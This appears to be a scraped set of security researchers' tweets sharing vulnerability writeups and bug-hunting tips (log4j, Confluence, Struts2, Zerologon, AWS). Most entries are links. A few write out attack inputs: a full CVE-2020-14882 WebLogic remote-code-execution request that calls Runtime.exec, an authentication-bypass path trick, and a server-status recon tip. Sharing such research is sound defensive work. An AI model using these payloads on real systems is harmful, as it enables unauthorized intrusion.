Mahendra Thanniru

We wrote up a summary on the log4j 0-day that was found earlier today. This is going to be fun for a lot of people scrambling to patch this tonight! lunasec.io/docs/blog/log4…

the vulnerable grafana function github.com/grafana/grafan… #infosec #cybersecurity #appsec

Here's our writeup of CVE-2021-26084 Confluence RCE now that it's out in public. Although, there are still a few mysteries to be solved. cc: @rootxharsh github.com/httpvoid/write…

Yesterday at @ForAllSecure FuzzCon I mentioned I'd put on a free fuzzing course online if there is enough interest. If you are interested, email info@forallsecure.com. RT appreciated for awareness. #FuzzCon #hacking #defcon29

2021 = more writeups! 🎉 Check out my new @GoogleVRP writeup about stealing any private @YouTube video: bugs.xdavidhu.me/google/2021/01…

For red teams and pentesters, and defenders wanting to know attacks to look for and protect against, I've written down the techniques I would use to attack AWS environments. tldrsec.com/blog/lesser-kn…

@Rainsec_ @thecybermentor @ZephrFish @ippsec Congratulations @Rainsec_ 🥳

#CVE-2020-17530 (S2-061) Struts2 OGNL Expression Remote Code Execution @pwntester nice find!👍

Ran into a neat authentication bypass via extension whitelist today with @bbuerhaus and @_specters_: GET /admin%2ejsp%3b.png Was able to turn a number of post-auth SQL injections into pre-auth vulns. Always fun messing with these. 😁

I've just added an API routes wordlist containing 953011 possible API paths from the HTTPArchive dataset. Download it at wordlists.assetnote.io - all paths which start with "/api/", "/v1/", "/v2", or "/rest/". Good luck hacking! Thanks for requesting this, hope it helps.

💉Advanced MSSQL Injection Tricks💉 🩸 New DNS Out-Of-Band vector in SELECT statement 🩸 Quick exploitation: Get all table data in one query 🩸 Read local files in SELECT statement and more! Read the article: swarm.ptsecurity.com/advanced-mssql…

Pop up calculator in Weblogic 14.1.1

If you have found server-status, but there is nothing in it but statistics, try adding the full parameter to it: /server-status?full If it is PHP-FPM Status Page, you will be shown the request logs.

#CVE-2020–14882 Weblogic Unauthorized bypass RCE http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal POST: _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22) testbnull.medium.com/weblogic-rce-b…

It was Really fun playing. Thank you @hackthebox_eu #hbg for making such an awesome content as always. I would recommend everyone to give it a try.

@RitikSahni22 @eLearnSecurity Congratulations 👏

There seems to be quite some questions and confusion about the impact of exploiting Zerologon (CVE-2020-1472) on the environment. So here's a thread 👇